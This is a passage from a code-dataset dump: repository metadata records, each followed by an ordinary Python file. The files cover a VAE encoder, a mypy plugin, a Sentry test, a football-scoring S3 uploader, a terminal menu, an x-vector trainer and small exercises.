"[email protected]"
] | |
2abb9c8ae38feb38f85cf81f93563ee9f1f3914a
|
5cc9623db04e92a9ddee09c27a168d04c39b6e19
|
/model/encoder.py
|
beb00c3109d7b79d9fd4e96c2b9b261a3958fa8f
|
[
"MIT"
] |
permissive
|
FengHZ/VAEGAN
|
2e4d8c65d39e0b79a983b1be45c29987ecfc3f3e
|
0c113dc973b19fe212aca07a4a898fa919346d41
|
refs/heads/master
| 2020-05-22T04:52:42.156153 | 2019-05-12T07:30:09 | 2019-05-12T07:30:09 | 186,224,301 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,451 |
py
|
from torch import nn
import torch
class Encoder(nn.Module):
def __init__(self, num_channel=3, num_feature=64, latent_dim=100, data_parallel=True):
super(Encoder, self).__init__()
features = nn.Sequential(
# input is (num_channel) x 64 x 64
nn.Conv2d(num_channel, num_feature, 4, 2, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. (num_feature) x 32 x 32
nn.Conv2d(num_feature, num_feature * 2, 4, 2, 1, bias=False),
nn.BatchNorm2d(num_feature * 2),
nn.LeakyReLU(0.2, inplace=True),
# state size. (num_feature*2) x 16 x 16
nn.Conv2d(num_feature * 2, num_feature * 4, 4, 2, 1, bias=False),
nn.BatchNorm2d(num_feature * 4),
nn.LeakyReLU(0.2, inplace=True),
# state size. (num_feature*4) x 8 x 8
nn.Conv2d(num_feature * 4, num_feature * 8, 4, 2, 1, bias=False),
nn.BatchNorm2d(num_feature * 8),
nn.LeakyReLU(0.2, inplace=True),
)
z_mean_map = nn.Sequential(
# state size. (num_feature*8) x 4 x 4
nn.Conv2d(num_feature * 8, latent_dim, 4, 1, 0, bias=True),
)
z_log_sigma_map = nn.Sequential(
# state size. (num_feature*8) x 4 x 4
nn.Conv2d(num_feature * 8, latent_dim, 4, 1, 0, bias=True),
)
if data_parallel:
self.features = nn.DataParallel(features)
self.z_mean_map = nn.DataParallel(z_mean_map)
self.z_log_sigma_map = nn.DataParallel(z_log_sigma_map)
else:
self.features = features
self.z_mean_map = z_mean_map
self.z_log_sigma_map = z_log_sigma_map
for name, param in self.named_parameters():
if 'conv' in name and 'weight' in name:
nn.init.xavier_normal_(param.data)
elif 'norm' in name and 'weight' in name:
param.data.fill_(1)
elif 'norm' in name and 'bias' in name:
param.data.fill_(0)
def forward(self, input):
features = self.features(input)
mu = self.z_mean_map(features)
        log_sigma = self.z_log_sigma_map(features)
sigma = torch.exp(log_sigma)
std_z = torch.randn(mu.size())
if mu.is_cuda:
std_z = std_z.cuda()
z_sample = mu+std_z*sigma
return features, mu, log_sigma, sigma,z_sample
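# Hedged usage sketch (editor's addition): shapes assume 64x64 RGB input and
# the default hyper-parameters; data_parallel=False keeps it runnable on CPU.
if __name__ == '__main__':
    enc = Encoder(num_channel=3, num_feature=64, latent_dim=100, data_parallel=False)
    x = torch.randn(4, 3, 64, 64)
    features, mu, log_sigma, sigma, z_sample = enc(x)
    print(features.shape)            # torch.Size([4, 512, 4, 4])
    print(mu.shape, z_sample.shape)  # torch.Size([4, 100, 1, 1]) each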
|
[
"[email protected]"
] | |
7baa26a26fc7ed616e1f4cfa37d283d39e72ebf3
|
bbdd7f44884844cd0f7332d63945852dc2b53083
|
/mypy_drf_plugin/transformers/fields.py
|
f4f8a10b2f9cc833f0b0e6cedc3fe13340f2fdf9
|
[
"MIT"
] |
permissive
|
private-forks/djangorestframework-stubs
|
e258e1dfc2af80fdf93322338ea3ce5452087e2d
|
18427718c913f3d23ef7a4636c8205df42999cf2
|
refs/heads/master
| 2020-04-25T09:11:04.067894 | 2019-02-24T22:25:03 | 2019-02-24T22:25:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,241 |
py
|
from mypy.nodes import TypeInfo, Var
from mypy.plugin import FunctionContext
from mypy.types import AnyType, Instance, Type, TypeOfAny
from mypy_django_plugin import helpers
def get_private_descriptor_type(type_info: TypeInfo, private_field_name: str, is_nullable: bool) -> Type:
if not type_info.has_readable_member(private_field_name):
return AnyType(TypeOfAny.unannotated)
node = type_info.get(private_field_name).node
if isinstance(node, Var):
descriptor_type = node.type
if is_nullable:
descriptor_type = helpers.make_optional(descriptor_type)
return descriptor_type
return AnyType(TypeOfAny.unannotated)
def fill_parameters_of_descriptor_methods_from_private_attributes(ctx: FunctionContext) -> Type:
default_return_type = ctx.default_return_type
if not isinstance(default_return_type, Instance):
return default_return_type
is_nullable = bool(helpers.parse_bool(helpers.get_argument_by_name(ctx, 'allow_null')))
get_type = get_private_descriptor_type(default_return_type.type, '_pyi_private_get_type',
is_nullable=is_nullable)
return helpers.reparametrize_instance(default_return_type, [get_type])
|
[
"[email protected]"
] | |
d09ebfb916301f9570de15677478373cadbd685a
|
9db18bcc847ffdff8ca1aa8fe2470bdd1d17f609
|
/LAB1/generate_similar_event.py
|
32b83c22ea6385ae25638088ea0d280d905273fa
|
[] |
no_license
|
ShangGaoG/CVLAB
|
4397c125ec412329aa45af705465aae73b2f1d16
|
b9f1c24ba35a7af56f556a63796798bd4e8cc234
|
refs/heads/master
| 2023-03-25T15:48:07.566625 | 2020-12-09T00:49:54 | 2020-12-09T00:49:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,482 |
py
|
from utils.misc import *
import pandas as pd
from sklearn.metrics.pairwise import cosine_similarity
from matplotlib import pyplot as plt
import sys
import numpy as np
def generate_similar_events(query_path,gallery_path):
df = pd.read_json(gallery_path)
gallery_id = df['gallery_id']
gallery_vector = df['gallery_incident']
df_query_incident = pd.read_json(query_path)
query_id = df_query_incident['query_id']
query_vector = df_query_incident['query_incident']
gallery_vector = np.array(list(gallery_vector), dtype=float)
gallery_id = np.array(list(gallery_id))
query_vector = np.array(list(query_vector), dtype=float)
query_id = list(query_id)
length = len(query_id)
similar_events = []
for i in range(length):
id = query_id[i]
vector = query_vector[i]
similarity = cosine_similarity([vector], gallery_vector)
similarity = similarity.flatten()
arg_index = np.argsort(similarity)
arg_index = arg_index[::-1]
similarity_incident = gallery_id[list(arg_index[0:5])]
similar_events.append(similarity_incident)
df_new = pd.DataFrame({'query event':query_id,'similar events':similar_events})
df_new.to_csv('similar_event.csv')
df_new.to_json('similar_event.json')
query_path = '/home/xiaoxiaoyu/codes/imgs_cls/query_incident.json'
gallery_path = '/home/xiaoxiaoyu/codes/imgs_cls/gallery_incident.json'
generate_similar_events(query_path,gallery_path)
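# Hedged note (added for clarity): the script above assumes gallery_path points to a JSON
# file with columns 'gallery_id' and 'gallery_incident' (one feature vector per event) and
# query_path to one with 'query_id' and 'query_incident'; for each query event it keeps the
# five most cosine-similar gallery events and writes them to similar_event.csv/.json.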
|
[
"[email protected]"
] | |
12b66e27cea728950994f9107bed6a3ac88c37e0
|
977fcb9a15da52340dab332f7668dde57317f9f3
|
/tests/sentry/mediators/sentry_app_installations/test_creator.py
|
501aa0dfe71cb01db55eb1eb8186413f1a00b25c
|
[
"BSD-2-Clause"
] |
permissive
|
conan25216/sentry
|
8649761d4cbd2ff7ec21b1ac171f0997da2e692f
|
fe38ab19fb096688140b2065da0e45fa26762200
|
refs/heads/master
| 2020-04-09T12:37:20.846884 | 2018-12-04T12:20:26 | 2018-12-04T12:20:26 | 160,357,556 | 1 | 0 |
BSD-3-Clause
| 2018-12-04T12:56:51 | 2018-12-04T12:56:50 | null |
UTF-8
|
Python
| false | false | 1,566 |
py
|
from __future__ import absolute_import
from mock import patch
from sentry.mediators.sentry_app_installations import Creator
from sentry.models import ApiAuthorization
from sentry.testutils import TestCase
class TestCreator(TestCase):
def setUp(self):
self.user = self.create_user()
self.org = self.create_organization()
self.sentry_app = self.create_sentry_app(
name='nulldb',
organization=self.org,
scopes=('project:read',),
)
self.creator = Creator(
organization=self.org,
slug='nulldb',
user=self.user,
)
def test_creates_api_authorization(self):
install, grant = self.creator.call()
assert ApiAuthorization.objects.get(
application=self.sentry_app.application,
user=self.sentry_app.proxy_user,
scopes=self.sentry_app.scopes,
)
def test_creates_installation(self):
install, grant = self.creator.call()
assert install.pk
def test_creates_api_grant(self):
install, grant = self.creator.call()
assert grant.pk
@patch('sentry.tasks.app_platform.installation_webhook.delay')
def test_notifies_service(self, installation_webhook):
install, _ = self.creator.call()
installation_webhook.assert_called_once_with(install.id, self.user.id)
def test_associations(self):
install, grant = self.creator.call()
assert install.api_grant == grant
assert install.authorization is not None
|
[
"[email protected]"
] | |
137acc6d4721ec38018a668237bf95435195db61
|
6f2a072148725d98d2bc96235fde4e0d83aa9bbd
|
/lib/assets/scoring.py
|
ce268a59ff200a95cdabcb147bf66a9dc28f670e
|
[] |
no_license
|
jjh5166/prempicks
|
1fbf86fb4fe2eec952245f7ed9d4c9441a03257c
|
24b8951b57049a2d3872b917e7ad1e79156f2f53
|
refs/heads/master
| 2023-01-22T02:59:15.803754 | 2021-01-11T21:01:14 | 2021-01-11T21:01:14 | 144,220,632 | 0 | 0 | null | 2023-01-19T14:06:00 | 2018-08-10T01:20:46 |
Ruby
|
UTF-8
|
Python
| false | false | 3,060 |
py
|
import http.client, sys, os, json, boto3
from os.path import join, dirname
from dotenv import load_dotenv
dotenv_path = join(dirname(__name__), '.env')
load_dotenv(dotenv_path)
APIkey = str(os.getenv('FOOTBALL_API_KEY'))
AwsAccessKeyID = str(os.getenv('AWS_ACCESS_KEY_ID'))
AwsSecretAccessKey = str(os.getenv('AWS_SECRET_ACCESS_KEY'))
AwsRegion = str(os.getenv('AWS_REGION'))
AwsBucket = str(os.getenv('S3_BUCKET'))
matchday = str(sys.argv[1])
request_string = f'/v2/competitions/PL/matches/?matchday={matchday}'
connection = http.client.HTTPConnection('api.football-data.org')
headers = {'X-Auth-Token': APIkey}
connection.request('GET', request_string, None, headers)
response = json.loads(connection.getresponse().read().decode())
s3 = boto3.resource(
's3',
region_name=AwsRegion,
aws_access_key_id=AwsAccessKeyID,
aws_secret_access_key=AwsSecretAccessKey
)
with open('app/assets/data/code_to.json') as jfile:
teamcodes = json.load(jfile)
content = s3.Object(AwsBucket, 'lastyr.json')
file_content = content.get()['Body'].read().decode('utf-8')
lastszn = json.loads(file_content)['standings']
topSix = lastszn[:6]
newThree = lastszn[17:]
class ScoreMatch:
def __init__(self, data):
self.hGoals = data['score']['fullTime']['homeTeam']
self.aGoals = data['score']['fullTime']['awayTeam']
self.hTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
self.aTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
if self.hGoals == self.aGoals:
self.draw(data)
else:
self.tally(self.hGoals, self.aGoals)
self.assignTeams(data, self.diff)
self.topSixOrNew(self.wTeam, self.lTeam)
def draw(self, data):
self.wTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
self.lTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
self.wScore = self.lScore = 1
def tally(self, goals1, goals2):
self.diff = goals1-goals2
        cs = goals1 * goals2 == 0  # clean sheet: at least one side failed to score
self.wScore = 3 if abs(self.diff) >= 3 else 2
if cs:
self.wScore += 1
self.lScore = -4 if abs(self.diff) >= 3 else -3
def topSixOrNew(self, winner, loser):
if loser in topSix:
self.lScore -= 1
self.wScore += 1
if winner in newThree:
self.wScore += 1
def assignTeams(self, data, diff):
if diff > 0:
self.wTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
self.lTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
else:
self.wTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
self.lTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
scores = {}
for m in response['matches']:
if m['status'] == "FINISHED":
match = ScoreMatch(m)
scores[match.wTeam] = match.wScore
scores[match.lTeam] = match.lScore
scores_json = json.dumps(scores)
filename = 'scores/matchday' + matchday + '.json'
s3.Object(AwsBucket, filename).put(Body=scores_json)
|
[
"[email protected]"
] | |
a2a16481c7b8f3bafa0f35b577b432e7fc6f2adc
|
b4272e8a7863c27644f104c42e1d99c6cd02d8a7
|
/15_printing_CL_arguments.py
|
5e066b025df1f3293dfcde3c98a25165554d2580
|
[] |
no_license
|
skanda9927/year2020
|
613856b7cfa3405f268d930fc4cbdd9897b5709e
|
3745e1caadb4051399505d2cc9e642a930a0c088
|
refs/heads/master
| 2020-12-22T04:15:44.428379 | 2020-01-28T05:50:43 | 2020-01-28T05:50:43 | 236,667,507 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 728 |
py
|
#15. Command line arguments to Python: print the count, list them, print the last argument value
#PSEUDOCODE
# Step 1 : import the module named sys
# Step 2 : copy the variables stored in the system built in list argv
# Step 3 : find the length of argument_list using the len function and store it in the variable length
# Step 4 : using for loop with length print all values stored in argument_list
import sys
# command line arguments are stored in the form
# of list in sys.argv
argumentList = sys.argv
length = len(argumentList)
for index in range(0,length) :
print (argumentList[index])
|
[
"[email protected]"
] | |
8de04f6692ceeecd098e35ffafb2f1c85e4a9be7
|
cae1c6d385be49c48342733d105fe0ef817b4c02
|
/tajna.py
|
e77b4821e9372ac4094130b880fe3aacda51665e
|
[] |
no_license
|
silvikavcak/pyladies
|
f7c61228b5170dfec7537766abbe97f355d5feb9
|
da46798e76dfffdc1c91961b9b6271256ea48b40
|
refs/heads/main
| 2023-03-19T08:03:12.613500 | 2021-03-05T18:44:40 | 2021-03-05T18:44:40 | 344,892,517 | 0 | 0 | null | 2021-03-05T18:44:41 | 2021-03-05T17:59:45 |
Python
|
UTF-8
|
Python
| false | false | 308 |
py
|
heslo = input("Zadaj heslo a poviem ti tajnostku: ")
if heslo == "susky-susky":
print("Ak sa chytis prstom pravej ruky laveho ucha a pri tom poskaces 3x 50 cm vysoko, do zajtra bude na nebi o hviezdicku viac.")
else:
print("Tajomstvo velkej Arkany ti je zapovedane ty nehodny smrtelny cervik!")
|
[
"[email protected]"
] | |
942bc1da706f608feed237c33fbfea72edac961d
|
59e1df5962e76086bc5d9f88d96115d9a92bcda6
|
/拆分文件.py
|
ad97317632c30db1e6d4aa9383f986bc6d6f131d
|
[] |
no_license
|
jiajinlong0301/ibond_jia
|
484a68b7e3c9ee265824d31e8658448c04aa1d8a
|
8dc6dd90ff68aa2f91359792837d2052e57d8576
|
refs/heads/master
| 2023-01-28T03:11:56.759342 | 2020-12-03T07:28:58 | 2020-12-03T07:28:58 | 313,263,427 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,776 |
py
|
import os
import pandas as pd
# filename is the path of the file to split; file_num is the number of output files
# Different branches run depending on whether the file has a header row (header=True by default)
def Data_split(filename,file_num,header=True):
if header:
        # chunk size for the counting pass, initialised to 10,000 rows
chunksize=10000
data1=pd.read_table(filename,chunksize=chunksize,sep=',',encoding='gbk')
# print(data1)
        # num is the total number of rows
num=0
for chunk in data1:
num+=len(chunk)
# print(num)
        # chunksize is now the number of rows each output file should receive
chunksize=round(num/file_num+1)
# print(chunksize)
        # split the path into directory head and file name tail with os.path.split(filename)
head,tail=os.path.split(filename)
data2=pd.read_table(filename,chunksize=chunksize,sep=',',encoding='gbk')
i=0
for chunk in data2:
chunk.to_csv('{0}_{1}{2}'.format(head,i,tail),header=None,index=False)
print('保存第{0}个数据'.format(i))
i+=1
else:
        # work out the number of rows each output file should receive
chunksize=10000
data1=pd.read_table(filename,chunksize=chunksize,header=None,sep=',')
num=0
for chunk in data1:
num+=len(chunk)
chunksize=round(num/file_num+1)
head,tail=os.path.split(filename)
data2=pd.read_table(filename,chunksize=chunksize,header=None,sep=',')
i=0
for chunk in data2:
            chunk.to_csv('{0}_{1}{2}'.format(head,i,tail),header=None,index=False)
print('保存第{0}个数据'.format(i))
i+=1
filename='/Users/jiajinlong/PycharmProjects/zk120000w.csv'
# the second argument is the number of files to split into
Data_split(filename,2,header=True)
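# Hedged note (added for clarity): Data_split makes two passes over the CSV — the first
# counts the total number of rows, the second re-reads the file in file_num chunks and
# writes each chunk to its own file derived from the original path.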
|
[
"[email protected]"
] | |
7f168e5086d999df72156adf6973e55195c755a1
|
42a41febceba5e1ae9e410a1b07868e4e4955af1
|
/NomticketDjangoAPP/core/migrations/0019_empleado_nombreusuario.py
|
9efce0188efd1b5f211e6eb513cb6315b6e46642
|
[] |
no_license
|
ignacio1985/NomTicket_Django
|
f06fff185a3e15bb7b8d28c9dfa34000c2eb8d37
|
38600a89c4219952f3ff4fbac7b92fc7b00b3920
|
refs/heads/main
| 2023-04-09T07:35:48.448970 | 2021-04-23T03:16:44 | 2021-04-23T03:16:44 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 484 |
py
|
# Generated by Django 3.1.2 on 2021-04-18 18:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('CORE', '0018_auto_20210418_1354'),
]
operations = [
migrations.AddField(
model_name='empleado',
name='nombreUsuario',
field=models.CharField(default=0, max_length=30, unique=True, verbose_name='Nombre de usuario'),
preserve_default=False,
),
]
|
[
"[email protected]"
] | |
3b07e931dae87dcef3d537f0fd4eb5ac052fa0ae
|
00d7e9321d418a2d9a607fb9376b862119f2bd4e
|
/sandbox/launcher_crap.py
|
7024adf4c0e3f981f6383ef806bc67fc73597616
|
[
"MIT"
] |
permissive
|
baluneboy/pims
|
92b9b1f64ed658867186e44b92526867696e1923
|
5a07e02588b1b7c8ebf7458b10e81b8ecf84ad13
|
refs/heads/master
| 2021-11-16T01:55:39.223910 | 2021-08-13T15:19:48 | 2021-08-13T15:19:48 | 33,029,780 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,405 |
py
|
import urwid
palette = [('header', 'white', 'black'),
('reveal focus', 'black', 'dark cyan', 'standout')]
menu = {"121f02, 200Hz": 'do 121f02, 200Hz',
"121f03, 200Hz": 'do 121f03, 200Hz',
"121f04, 200Hz": 'do 121f04, 200Hz'}
items = [urwid.Text(k) for k in menu.keys()]
content = urwid.SimpleListWalker([urwid.AttrMap(w, None, 'reveal focus') for w in items])
listbox = urwid.ListBox(content)
show_key = urwid.Text("Press any key", wrap='clip')
head = urwid.AttrMap(show_key, 'header')
top = urwid.Frame(listbox, head)
def show_all_input(input, raw):
show_key.set_text("Pressed: " + " ".join([
str(i) for i in input]))
return input
def exit_on_cr(input):
if input in ('q', 'Q'):
raise SystemExit
elif input == 'up':
focus_widget, idx = listbox.get_focus()
if idx > 0:
idx = idx-1
listbox.set_focus(idx)
elif input == 'down':
focus_widget, idx = listbox.get_focus()
idx = idx+1
if idx > len(items)-1:
idx = 0
listbox.set_focus(idx)
elif input == 'enter':
raise urwid.ExitMainLoop()
def out(s):
show_key.set_text(str(s))
loop = urwid.MainLoop(top, palette, input_filter=show_all_input, unhandled_input=exit_on_cr)
loop.run()
print(menu[items[listbox.get_focus()[1]].get_text()[0]])
|
[
"[email protected]"
] | |
f352ec7987f6f9addb4cc8a333cc19463e602697
|
5332fef91e044555e605bb37cbef7c4afeaaadb0
|
/hy-data-analysis-with-python-2020/part02-e06_file_count/test/test_file_count.py
|
c7d3f00f44cd8f760c403784983ad6ec08d26a70
|
[] |
no_license
|
nopomi/hy-data-analysis-python-2019
|
f3baa96bbe9b6ee7f0b3e6f6b8b0f3adfc3b6cc8
|
464685cb377cfdeee890a008fbfbd9ed6e3bcfd0
|
refs/heads/master
| 2021-07-10T16:16:56.592448 | 2020-08-16T18:27:38 | 2020-08-16T18:27:38 | 185,044,621 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,560 |
py
|
#!/usr/bin/env python3
import sys
import unittest
from unittest.mock import patch
from itertools import repeat
from tmc import points
from tmc.utils import load, get_out
module_name="src.file_count"
file_count = load(module_name, "file_count")
main = load(module_name, "main")
class FileCount(unittest.TestCase):
@points('p02-06.1')
def test_first(self):
l, w, c = file_count("src/test.txt")
self.assertEqual(l, 8, msg="Wrong number of lines for file 'test.txt'!")
self.assertEqual(w, 105, msg="Wrong number of words for file 'test.txt'!")
self.assertEqual(c, 647, msg="Wrong number of characters for file 'test.txt'!")
@points('p02-06.1')
def test_calls(self):
with patch('builtins.open', side_effect=open) as o:
file_count("src/test.txt")
o.assert_called_once()
@points('p02-06.2')
def test_main(self):
orig_argv = sys.argv
n = 7
sys.argv[1:] = ["file%i" % i for i in range(n)]
with patch('src.file_count.file_count', side_effect=repeat((0,0,0))) as fc:
main()
self.assertEqual(fc.call_count, n,
msg="Wrong number of calls to function 'file_count' for %i command line parameters!" % n)
result = get_out().split('\n')
for i, line in enumerate(result):
self.assertEqual(line.strip(), "0\t0\t0\tfile%i" % i,
msg="Wrong result on line %i!" % i)
sys.argv = orig_argv
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
64acd726fc80f2bd6451b0e36ae4cde1f625e944
|
8c2de4da068ba3ed3ce1adf0a113877385b7783c
|
/hyperion/torch/trainers/xvector_trainer.py
|
190b2a30b1c2f28d38d0c6999040ce4ae6a76f9f
|
[
"Apache-2.0"
] |
permissive
|
hyperion-ml/hyperion
|
a024c718c4552ba3a03aae2c2ca1b8674eaebc76
|
c4c9eee0acab1ba572843373245da12d00dfffaa
|
refs/heads/master
| 2023-08-28T22:28:37.624139 | 2022-03-25T16:28:08 | 2022-03-25T16:28:08 | 175,275,679 | 55 | 20 |
Apache-2.0
| 2023-09-13T15:35:46 | 2019-03-12T18:40:19 |
Python
|
UTF-8
|
Python
| false | false | 5,015 |
py
|
"""
Copyright 2019 Johns Hopkins University (Author: Jesus Villalba)
Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""
import os
from collections import OrderedDict as ODict
import logging
import torch
import torch.nn as nn
from ..utils import MetricAcc
from .torch_trainer import TorchTrainer
class XVectorTrainer(TorchTrainer):
"""Trainer to train x-vector style models.
Attributes:
model: x-Vector model object.
optim: pytorch optimizer object or options dict
epochs: max. number of epochs
exp_path: experiment output path
cur_epoch: current epoch
grad_acc_steps: gradient accumulation steps to simulate larger batch size.
device: cpu/gpu device
metrics: extra metrics to compute besides cxe.
lrsched: learning rate scheduler object or options dict
loggers: LoggerList object, loggers write training progress to std. output and file.
If None, it uses default loggers.
ddp: if True use distributed data parallel training
ddp_type: type of distributed data parallel in (ddp, oss_ddp, oss_shared_ddp)
loss: if None, it uses cross-entropy
train_mode: training mode in ['train', 'ft-full', 'ft-last-layer']
use_amp: uses mixed precision training.
log_interval: number of optim. steps between log outputs
use_tensorboard: use tensorboard logger
use_wandb: use wandb logger
wandb: wandb dictionary of options
grad_clip: norm to clip gradients, if 0 there is no clipping
grad_clip_norm: norm type to clip gradients
swa_start: epoch to start doing swa
swa_lr: SWA learning rate
swa_anneal_epochs: SWA learning rate anneal epochs
cpu_offload: CPU offload of gradients when using fully sharded ddp
"""
def __init__(
self,
model,
optim={},
epochs=100,
exp_path="./train",
cur_epoch=0,
grad_acc_steps=1,
device=None,
metrics=None,
lrsched=None,
loggers=None,
ddp=False,
ddp_type="ddp",
loss=None,
train_mode="train",
use_amp=False,
log_interval=10,
use_tensorboard=False,
use_wandb=False,
wandb={},
grad_clip=0,
grad_clip_norm=2,
swa_start=0,
swa_lr=1e-3,
swa_anneal_epochs=10,
cpu_offload=False,
):
if loss is None:
loss = nn.CrossEntropyLoss()
super().__init__(
model,
loss,
optim,
epochs,
exp_path,
cur_epoch=cur_epoch,
grad_acc_steps=grad_acc_steps,
device=device,
metrics=metrics,
lrsched=lrsched,
loggers=loggers,
ddp=ddp,
ddp_type=ddp_type,
train_mode=train_mode,
use_amp=use_amp,
log_interval=log_interval,
use_tensorboard=use_tensorboard,
use_wandb=use_wandb,
wandb=wandb,
grad_clip=grad_clip,
grad_clip_norm=grad_clip_norm,
swa_start=swa_start,
swa_lr=swa_lr,
swa_anneal_epochs=swa_anneal_epochs,
cpu_offload=cpu_offload,
)
def train_epoch(self, data_loader):
"""Training epoch loop
Args:
data_loader: pytorch data loader returning features and class labels.
"""
self.model.update_loss_margin(self.cur_epoch)
metric_acc = MetricAcc(device=self.device)
batch_metrics = ODict()
self.set_train_mode()
for batch, (data, target) in enumerate(data_loader):
self.loggers.on_batch_begin(batch)
if batch % self.grad_acc_steps == 0:
self.optimizer.zero_grad()
data, target = data.to(self.device), target.to(self.device)
batch_size = data.shape[0]
with self.amp_autocast():
output = self.model(data, target, **self.amp_args)
loss = self.loss(output, target).mean() / self.grad_acc_steps
if self.use_amp:
self.grad_scaler.scale(loss).backward()
else:
loss.backward()
if (batch + 1) % self.grad_acc_steps == 0:
if self.lr_scheduler is not None and not self.in_swa:
self.lr_scheduler.on_opt_step()
self.update_model()
batch_metrics["loss"] = loss.item() * self.grad_acc_steps
for k, metric in self.metrics.items():
batch_metrics[k] = metric(output, target)
metric_acc.update(batch_metrics, batch_size)
logs = metric_acc.metrics
logs["lr"] = self._get_lr()
self.loggers.on_batch_end(logs=logs, batch_size=batch_size)
logs = metric_acc.metrics
logs = ODict(("train_" + k, v) for k, v in logs.items())
logs["lr"] = self._get_lr()
return logs
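# Hedged illustration (added, not part of the original trainer): the gradient-accumulation
# pattern used in train_epoch above, isolated on a toy model; grad_acc_steps, the linear
# model and the random tensors are assumptions for the sketch only.
def _grad_accumulation_sketch(grad_acc_steps=4, num_batches=8):
    model = nn.Linear(10, 2)
    optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
    loss_fn = nn.CrossEntropyLoss()
    for batch in range(num_batches):
        if batch % grad_acc_steps == 0:
            optimizer.zero_grad()  # reset gradients at the start of each accumulation window
        data = torch.randn(16, 10)
        target = torch.randint(0, 2, (16,))
        # divide so the accumulated gradient matches one batch that is grad_acc_steps times larger
        loss = loss_fn(model(data), target) / grad_acc_steps
        loss.backward()
        if (batch + 1) % grad_acc_steps == 0:
            optimizer.step()  # apply the accumulated update once per window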
|
[
"[email protected]"
] | |
aad8fc74a43007757734b635989c1238c35e75a1
|
da8cc1653f8ed4e553fb908a06a5b59e7113d188
|
/migrations/versions/053be705576c_new_fields_in_user_model.py
|
0a3697dbd131f4c0b4597105e4f10b6f8db52417
|
[] |
no_license
|
isaachulvey/tft-companion-app
|
31a6ae4e768f45c17a635188687079754cc8a876
|
ec80fcd0033315e92db78da8cf7575ecca7ad9a2
|
refs/heads/master
| 2022-10-07T05:04:28.935310 | 2020-04-08T18:58:02 | 2020-04-08T18:58:02 | 249,787,351 | 2 | 0 | null | 2022-09-16T18:21:09 | 2020-03-24T18:31:34 |
Python
|
UTF-8
|
Python
| false | false | 792 |
py
|
"""new fields in user model
Revision ID: 053be705576c
Revises: 7546358da6cd
Create Date: 2020-04-07 11:36:58.369264
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '053be705576c'
down_revision = '7546358da6cd'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('user', sa.Column('about_me', sa.String(length=140), nullable=True))
op.add_column('user', sa.Column('last_seen', sa.DateTime(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('user', 'last_seen')
op.drop_column('user', 'about_me')
# ### end Alembic commands ###
|
[
"[email protected]"
] | |
583cccb8c6a66535f378859ee3db2a6dccf5f457
|
c3f3ce2557682a53199a5ff6e8faf988dfa395fa
|
/1 - Introduccion/ejercicio2.py
|
919c9eb7a908c3eb0d7afde5f95470d814441e24
|
[
"MIT"
] |
permissive
|
yang-itimec/Python-basics
|
b6a19cb94882fac917245ec9af2f3eca2bbc25d5
|
52fbe2019619d760d393dbfed96bbd823b9ba698
|
refs/heads/master
| 2020-04-10T17:44:27.691443 | 2018-12-14T14:47:57 | 2018-12-14T14:47:57 | 161,182,531 | 0 | 0 | null | 2018-12-11T15:44:54 | 2018-12-10T13:52:58 |
Python
|
UTF-8
|
Python
| false | false | 954 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 10 16:51:53 2018
@author: PENG YANG YANG
"""
########################
# TOPIC 1 - EXERCISE 2 #
########################
'''
Exercises on mutation, aliasing and cloning
1- Create a list with the months of the year (lista1).
2- Create an alias of the list (lista2).
3- Clone the list (lista3).
4- Append "Fin de Año" to lista1.
5- Print lista2 and lista3.
'''
%reset -f
#%% 1- Create a list with the months of the year (lista1).
lista1 = ['Enero','Febrero','Marzo','Abril','Mayo','Junio','Julio','Agosto',
'Septiembre','Octubre','Noviembre','Diciembre']
lista1
#%% 2- Create an alias of the list (lista2).
lista2 = lista1
lista2
#%% 3- Clone the list (lista3).
lista3 = lista1[:]
lista3
#%% 4- Append "Fin de Año" to lista1.
lista1.append('Fin de Año')
lista1
#%% 5- Print lista2 and lista3.
print(lista2)
print(lista3)
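#%% Note (added): expected behaviour — lista2 is an alias of lista1, so it also shows
# 'Fin de Año' at the end, while lista3 was cloned with lista1[:] before the append and
# still contains only the twelve months.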
|
[
"[email protected]"
] | |
1eba989f3c48ca9bd2b7d760fa77a54a3143f1b6
|
39262b161d4d8eb290ed1a013a23a33d45be533b
|
/package/gpsuploader.py
|
eb18c63592ba52d8d5c8d45104bd90f6d19e865d
|
[] |
no_license
|
watermelonharry/socket_func_pyqt
|
be9394105f5cf7c442479c04b0ac18c2a05c3605
|
bedbc5d3946a49eced472fcdea8cc70d727ec0ab
|
refs/heads/master
| 2021-01-16T21:29:17.226298 | 2017-07-27T12:24:22 | 2017-07-27T12:24:22 | 59,997,128 | 1 | 0 | null | 2016-06-04T02:44:53 | 2016-05-30T09:19:47 |
Python
|
UTF-8
|
Python
| false | false | 5,459 |
py
|
# -*- coding:UTF-8 -*-
import time
from PyQt4.QtCore import QThread, QMutex, QMutexLocker
import threading
import requests, os
"""
Based on the Baidu Yingyan (eagle-eye) track API: http://lbsyun.baidu.com/index.php?title=yingyan/api/track
"""
##config file path
CONFIG_PATH = '/'.join(os.getcwd().split('\\')) + '/websrc/gps_config.dat'
